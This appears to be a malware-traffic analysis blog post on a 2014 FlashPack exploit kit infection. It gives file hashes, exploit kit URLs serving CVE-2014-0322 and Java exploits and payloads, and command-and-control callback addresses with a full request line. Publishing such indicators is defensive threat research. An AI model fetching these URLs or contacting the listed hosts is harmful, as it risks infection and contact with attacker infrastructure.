2014-03-29 - FLASHPACK EK

ASSOCIATED FILES:

NOTES:

 

CHAIN OF EVENTS

ASSOCIATED DOMAINS

 

.htaccess redirect from the compromised website to the FlashPack EK domain for infection traffic:

After the initial malware is delivered, the traffic goes to adultfriendfinder.com:

Post-infection callback traffic:

 

PRELIMINARY MALWARE ANALYSIS

JAVA EXPLOIT

File name:  2014-03-29-FlashPack-EK-java-exploit.jar
File size:  9.5 KB ( 9690 bytes )
MD5 hash:  e5c7b0714c4735d4df40d55f9d73cbb1
Detection ratio:  8 / 51
First submission:  2014-03-06 17:37:59 UTC
VirusTotal link:  https://www.virustotal.com/en/file/8e918479fc7a46f45a65d3726eae336a6b6d3c4b9b13906d2dcf7ca96ab2e02d/analysis/

 

MALWARE PAYLOAD

File name:  2014-03-29-FlashPack-EK-malware-payload.exe
File size:  89.0 KB ( 91175 bytes )
MD5 hash:  a850b4a8dd9bd4477759c03aa35de9a0
Detection ratio:  21 / 51
First submission:  2014-03-29 05:42:03 UTC
VirusTotal link:  https://www.virustotal.com/en/file/1d219ed0fe25096301a7ff01ce6978096664f0f9ce961c2fbd293dd4f22548f9/analysis/
Malwr link:  https://malwr.com/analysis/Yjk3NDBkZTllNzc2NGQzYzkzMWJkMzkzM2YxZWVhNTk/

 

SECOND EXE SEEN AFTER THE INITIAL INFECTION

File name:  2014-03-29-FlashPack-EK-malware-02.exe
File size:  136.7 KB ( 139958 bytes )
MD5 hash:  bc8a81a2a241b003d3b3f4807c7cfaa5
Detection ratio:  14 / 51
First submission:  2014-03-29 05:42:29 UTC
VirusTotal link:  https://www.virustotal.com/en/file/44866c461b1fcf894f5cb5e05f001a5334b1edff351674ffe2b2f1cb086068e6/analysis/
Malwr link:  https://malwr.com/analysis/ZjNiMGZhOGE3MGUyNDM0NzlmY2ZhYzg2MTE2MTgxMDU/

 

DLL EXTRACTED FROM JPEG FILE (see below for details)

File name:  sqlrenew.txt
File size:  13.0 KB ( 13312 bytes )
MD5 hash:  fe376ea90c58dbff1c05601b7a323339
Detection ratio:  3 / 51
First submission:  2014-03-29 05:42:56 UTC
VirusTotal link:  https://www.virustotal.com/en/file/176813179ca03068647f035b3bc1fb26cf757980bbdd28134339d4beeefab377/analysis/
Malwr link:  https://malwr.com/analysis/MjEyMDhlM2M2MGM5NDNjYmE5MGE0MGQyZmIyMGU2MGQ/

 

SNORT EVENTS

SNORT EVENTS FOR THE INFECTION TRAFFIC (from Sguil on Security Onion)

 

HIGHLIGHTS FROM THE TRAFFIC

Comrpomised website redirecting from search engine visitor (.htaccess redirect):

 

CVE-2014-0322 portion of the exploit traffic begins here:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/link2jpg/index.php


For details, see:  Malware Don't Need Coffee's article

 

Flash helper:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/link2jpg/a6f34.swf

 

CVE-2014-0322 delivers malware payload:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/loadmsie10.php

 

Java exploit:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/include/597bb8ffeaf7950c575c540b37bccd29.jar

 

Java exploit delivers the same malware payload:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/loaddb.php

 

And there's this image, apparently related to the CVE-2014-0322 traffic:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/codex/admin/Erido.jpg

NOTE:  Malware Don't Need Coffee's article already shows this.  I'm just repeating the same information.

 

Different EXE file retrieved after the initial infection:  bkapaep35cp5h47qef1lpgl.fm.gen.tr/software.php?03290020961320170

 

Callback traffic to 195.191.24.40 over port 19285 with no host shown in the HTTP header: GET /stat?uid=100&downlink=1111&uplink=1111&id=00035669&statpass=bpass&
version=20140325&features=30&guid=231ea33d-3860-4571-a15a-4cda85d1e373&comment=20140325&p=0&s= HTTP/1.0

 

More callback traffic:  46.165.222.218/

 

FINAL NOTES

Once again, here are links for the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.